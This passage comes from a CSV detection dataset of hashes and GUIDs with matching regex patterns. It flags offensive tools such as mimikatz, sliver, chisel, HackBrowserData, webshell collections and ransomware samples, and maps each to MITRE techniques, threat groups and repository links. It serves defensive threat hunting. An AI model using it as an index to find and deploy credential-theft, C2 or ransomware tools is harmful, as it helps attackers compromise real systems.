LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39530" "*d2910692ffb6571d6017e93018699ef5b29d8aa30b0020729569bb5855460c72*",".{0,1000}d2910692ffb6571d6017e93018699ef5b29d8aa30b0020729569bb5855460c72.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39531" "*d291d7237d10448e6c9941e8815757525eb03fb55a2a9afd5a48a1905e6429df*",".{0,1000}d291d7237d10448e6c9941e8815757525eb03fb55a2a9afd5a48a1905e6429df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39532" "*d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb*",".{0,1000}d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39533" 
"*d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517*",".{0,1000}d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39534" "*d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97*",".{0,1000}d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","39536" "*d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc*",".{0,1000}d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","39537" 
"*d2b3eeb6f1b53e1abcf5d2bd58a1708466a9d6414e5b7c0ad14d89566e7b6c7a*",".{0,1000}d2b3eeb6f1b53e1abcf5d2bd58a1708466a9d6414e5b7c0ad14d89566e7b6c7a.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39539" "*d2ba2c40a27cc310f8369bd19e46b5efcf954259bf229c30f4fa24f661f49504*",".{0,1000}d2ba2c40a27cc310f8369bd19e46b5efcf954259bf229c30f4fa24f661f49504.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39540" "*d2c8ec1e20dce80ee2144540b910c5adefcd2357a13960c73501f0213f771c32*",".{0,1000}d2c8ec1e20dce80ee2144540b910c5adefcd2357a13960c73501f0213f771c32.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39542" "*d2c8ef54b087ba42e9745f210cdc9ae431a8092ca2c2c7878a2b8329d77cb447*",".{0,1000}d2c8ef54b087ba42e9745f210cdc9ae431a8092ca2c2c7878a2b8329d77cb447.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39543" 
"*d2cb266890e46c37292349b26bff380e5a1b2ab09ec20b04a530bbfb0252fdc8*",".{0,1000}d2cb266890e46c37292349b26bff380e5a1b2ab09ec20b04a530bbfb0252fdc8.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39544" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05","10","10","N/A","N/A","N/A","N/A","39546" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","39547" 
"*d2e1fecf21091637be0e6d72ad7bca6bfb5e6bb4e59e093bb57907fe3a14c9b6*",".{0,1000}d2e1fecf21091637be0e6d72ad7bca6bfb5e6bb4e59e093bb57907fe3a14c9b6.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","39548" "*d2ea7a48b45df38e486ffe3757119d2257cd4b2a560ca67c463aff63e9a34a0d*",".{0,1000}d2ea7a48b45df38e486ffe3757119d2257cd4b2a560ca67c463aff63e9a34a0d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","39549" "*d2eaa9862ed7aa1d38f19684757cc30a8f7b9b4f0fb1bd96d6fff0948c7326fa*",".{0,1000}d2eaa9862ed7aa1d38f19684757cc30a8f7b9b4f0fb1bd96d6fff0948c7326fa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39550" "*d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d*",".{0,1000}d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39552" "*d2f2208befd430af548bf911e596fb11381d60179caf6a8b80d1ded689787e16*",".{0,1000}d2f2208befd430af548bf911e596fb11381d60179caf6a8b80d1ded689787e16.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39553" "*d2fe624c63b655021b81ba91f90618cb9fc9ea56535117e945f41912cd9f2cd5*",".{0,1000}d2fe624c63b655021b81ba91f90618cb9fc9ea56535117e945f41912cd9f2cd5.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","39555" "*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*",".{0,1000}d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","39556" "*d2hvYW1p*",".{0,1000}d2hvYW1p.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","39557" "*D305F8A3-019A-4CDF-909C-069D5B483613*",".{0,1000}D305F8A3\-019A\-4CDF\-909C\-069D5B483613.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#GUIDproject","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","39558" "*d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8*",".{0,1000}d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39559" "*d3099edc6d73f362aa7672cfa3d7e0af5254484a4af0d5ac65da2eae8c229512*",".{0,1000}d3099edc6d73f362aa7672cfa3d7e0af5254484a4af0d5ac65da2eae8c229512.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39560" "*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - 
T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#GUIDproject","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","39562" "*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","#GUIDproject","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","39563" "*d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e*",".{0,1000}d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39564" "*d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e*",".{0,1000}d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39565" "*d31689572f9c5c80ca601075267a0db0e32b89665f039e721b27f6b9536c3be2*",".{0,1000}d31689572f9c5c80ca601075267a0db0e32b89665f039e721b27f6b9536c3be2.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39566" "*d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482*",".{0,1000}d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39569" "*d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369*",".{0,1000}d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39571" "*d328400cdc424aa3a54ad23f20979aca1324d1de62e28a69c18819671e597b03*",".{0,1000}d328400cdc424aa3a54ad23f20979aca1324d1de62e28a69c18819671e597b03.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","39572" "*d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5*",".{0,1000}d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","39573" "*d329cca0959dea29eaba648c72467bc41d7b8560061acf377124c208224d035d*",".{0,1000}d329cca0959dea29eaba648c72467bc41d7b8560061acf377124c208224d035d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39574" "*d32e6555888090a428d9d01ea171521419948e23f7362d15dc9e5fa2f14c3440*",".{0,1000}d32e6555888090a428d9d01ea171521419948e23f7362d15dc9e5fa2f14c3440.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39575" "*d32e8a5b2059eed68244a2089804df6943f575520b09f27d55de0f7c0a10d5a5*",".{0,1000}d32e8a5b2059eed68244a2089804df6943f575520b09f27d55de0f7c0a10d5a5.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39576" "*d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596*",".{0,1000}d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","39577" "*d33f6e8b7b07e293f431cb39fb4463d854500921ee23fd661143a5c01785417b*",".{0,1000}d33f6e8b7b07e293f431cb39fb4463d854500921ee23fd661143a5c01785417b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","39579" "*d3423d953de70480415b1bb516c2a5c635cf2c78a531cc5e4afce3ab11725e90*",".{0,1000}d3423d953de70480415b1bb516c2a5c635cf2c78a531cc5e4afce3ab11725e90.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the 
Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","39581" "*d345588bd7855b93993aa01e5c36cd6f9c1690277704d24a6121fe8d05f93d10*",".{0,1000}d345588bd7855b93993aa01e5c36cd6f9c1690277704d24a6121fe8d05f93d10.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39582" "*d3468041efe888dda240f4aafc6182365b39dfe0ca7ae9c5c5acc0802a34bc5d*",".{0,1000}d3468041efe888dda240f4aafc6182365b39dfe0ca7ae9c5c5acc0802a34bc5d.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","39583" "*d350f54074d0eb76f3568b2983c1010cd7190f327a5420034de0ca4ad04c6dbd*",".{0,1000}d350f54074d0eb76f3568b2983c1010cd7190f327a5420034de0ca4ad04c6dbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39585" "*D35A55BD-3189-498B-B72F-DC798172E505*",".{0,1000}D35A55BD\-3189\-498B\-B72F\-DC798172E505.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - 
TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#GUIDproject","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","39586" "*d366383b6e737fd3af2acc5ebc9f209a2c49209b7b444af3c7fe1d39e1775894*",".{0,1000}d366383b6e737fd3af2acc5ebc9f209a2c49209b7b444af3c7fe1d39e1775894.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","39588" "*d36d52f798b5f83599fcfefc4051370bd353cffb8ec822f81a2cb7401ac9a667*",".{0,1000}d36d52f798b5f83599fcfefc4051370bd353cffb8ec822f81a2cb7401ac9a667.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39589" "*d36e479529f169aeb563134d5ded662aed0e9d5ce15a357d2a2832370e1cce0c*",".{0,1000}d36e479529f169aeb563134d5ded662aed0e9d5ce15a357d2a2832370e1cce0c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","39590" 
